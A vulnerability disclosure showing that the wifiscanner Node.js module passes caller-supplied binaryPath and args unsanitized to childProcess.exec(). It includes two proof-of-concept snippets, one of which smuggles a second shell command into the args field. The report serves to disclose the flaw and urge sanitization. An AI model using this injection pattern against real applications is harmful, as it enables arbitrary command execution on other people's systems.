Remote Code Execution Bug due to Improper Input Sanitization

[AbhishekHerle]

This module can be used with options that can be used to overwrite default executable/binary path and arguments to the said executable/binary. An attacker can abuse this functionality to have the module execute a binary of their choice.

The following code snippets in the wifiscanner.js is responsible for the issue.

scan(callback, standardErrorCallback) {
childProcess.exec(this.command, (error, standardOut, standardError) => {
if (standardError && typeof standardErrorCallback === "function") {
standardErrorCallback(standardError);
}
callback(error, this.parse(standardOut.toString()));
});
}

get command() {
return this.options.binaryPath + " " + this.options.args;
}

As we can see, this.command is not sanitized in anyway prior to being passed to the exec().

Hence, the following payloads can be used to execute arbitrary commands:

Exploit 1:

let wifiscanner = require("wifiscanner");
let options = {
args: ";/bin/touch /tmp/exploit.txt;#"
}
let scanner = wifiscanner(options);
scanner.scan(function(error, networks){});

Exploit 2:

let wifiscanner = require("wifiscanner");
let options = {
args: "/tmp/exploit.txt",
binaryPath: "/bin/touch"
}
let scanner = wifiscanner(options);
scanner.scan(function(error, networks){});

User input must be appropriately sanitized prior to being passed to the module. At the very least users must be advised to manually sanitize user inputs when using this module.